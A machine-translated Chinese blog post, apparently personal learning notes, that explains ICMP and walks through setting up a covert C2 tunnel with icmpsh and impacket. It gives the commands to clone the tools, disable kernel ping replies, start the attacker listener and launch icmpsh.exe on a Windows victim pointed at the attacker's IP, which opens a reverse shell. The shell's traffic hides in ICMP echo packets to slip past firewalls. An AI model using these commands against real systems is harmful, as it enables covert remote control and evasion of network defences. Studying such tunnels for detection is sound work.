当前位置:网站首页>Hidden C2 tunnel -- use of icmpsh of ICMP
Hidden C2 tunnel -- use of icmpsh of ICMP
2022-07-04 10:35:00 【I·CE】
Learning records of pure rookies , Please correct any mistakes
Let's first get to know ICMP Make an agreement
ICMP Used to pass errors , control , Query and other information , At the network level , because IP The agreement is unreliable , And then there is ICMP agreement , Due to network detection , Route tracking and feedback
ICMP Message type :

Code fields of unreachable types often take values :

The timeout message code field is commonly used :

Message format :

Refer to https://blog.csdn.net/qq_21231413/article/details/88171590?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522164464850716780265452295%2522%252C%2522scm%2522%253A%252220140713.130102334.pc%255Fall.%2522%257D&request_id=164464850716780265452295&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2allfirst_rank_ecpm_v1~rank_v31_ecpm-2-88171590.pc_search_result_cache&utm_term=icmp%E5%8D%8F%E8%AE%AE&spm=1018.2226.3001.4187
hide c2 Tunnel of icmpsh
principle : During covert transmission , The attacker hides the command to be executed in ICMP_ECHO In the packet , Broiler receives packets , Solve the command and execute it on the host inside the firewall, and then hide the execution result in ICMP_ECHOREPLY In the packet , Send it to the external attacker
Use key points : Data section
The picture below is ping, then wireshark Grasping ICMP package

ps:ICMP The message is processed by the system kernel , Do not occupy any ports ( Generally, the communication needs ports , For example, you visit a website [80 port ], This opportunity randomly generates a greater than 1023 To access )
Tools :icmpsh Deal with deformities ping data
Attacked must be Windows,,,
1. download :
git clone https://github.com/inquisb/icmpsh.git
2. close ping reply , Prevent the kernel itself from ping Package response , refresh
sysctl -w net.ipv4.icmp_echo_ignore_all=1 # close ping reply ,0 Turn on
3. Installation environment
git clone https://github.com/SecureAuthCorp/impacket.git # If you fail, try connecting directly to the physical network
cd impacket
sudo python setup.py install
The attack end :
cd icmpsh
./icmpsh_m.py <attacker’ s-ip> The attacked party # command
The attacked plane ordered
icmpsh.exe -t <attacker’ s-ip>


perform whoami
ok Let's see ICMP Data packets ( There are too many packets , Don't stop grabbing , Packets always have ,wireshark too strong ) data Part is whoami

Learn from vulnerability banks
边栏推荐
- Does any teacher know how to inherit richsourcefunction custom reading Mysql to do increment?
- If the uniapp is less than 1000, it will be displayed according to the original number. If the number exceeds 1000, it will be converted into 10w+ 1.3k+ display
- Safety reinforcement learning based on linear function approximation safe RL with linear function approximation translation 1
- MFC document view framework (relationship between classes)
- Check 15 developer tools of Alibaba
- Write a program to define an array with 10 int elements, and take its position in the array as the initial value of each element.
- [Galaxy Kirin V10] [server] soft RAID configuration
- Differences among opencv versions
- Doris / Clickhouse / Hudi, a phased summary in June
- Some summaries of the third anniversary of joining Ping An in China
猜你喜欢

uniapp 小于1000 按原数字显示 超过1000 数字换算成10w+ 1.3k+ 显示

The future education examination system cannot answer questions, and there is no response after clicking on the options, and the answers will not be recorded

Network connection (II) three handshakes, four waves, socket essence, packaging of network packets, TCP header, IP header, ACK confirmation, sliding window, results of network packets, working mode of

BGP ---- border gateway routing protocol ----- basic experiment

leetcode1-3
![[Galaxy Kirin V10] [server] KVM create Bridge](/img/a4/a35a276d13e194cefc547607c59f00.jpg)
[Galaxy Kirin V10] [server] KVM create Bridge

Virtual machine configuration network

Network connection (III) functions and similarities and differences of hubs, switches and routers, routing tables and tables in switches, why do you need address translation and packet filtering?

The most detailed teaching -- realize win10 multi-user remote login to intranet machine at the same time -- win10+frp+rdpwrap+ Alibaba cloud server

Dynamic memory management
随机推荐
Velodyne configuration command
Uniapp--- initial use of websocket (long link implementation)
六月份阶段性大总结之Doris/Clickhouse/Hudi一网打尽
PHP programming language (1) - operators
Collection of practical string functions
Network disk installation
Button wizard business running learning - commodity quantity, price reminder, judgment Backpack
Knapsack problem and 0-1 knapsack problem
uniapp---初步使用websocket(长链接实现)
Jianzhi offer 04 (implemented in C language)
Map container
[Galaxy Kirin V10] [desktop and server] FRP intranet penetration
Sword finger offer 05 (implemented in C language)
Work order management system OTRs
Rhcsa day 9
Seven examples to understand the storage rules of shaped data on each bit
Basic data types of MySQL
Quick sort (C language)
[Galaxy Kirin V10] [server] failed to start the network
Si vous ne connaissez pas ces quatre modes de mise en cache, vous osez dire que vous connaissez la mise en cache?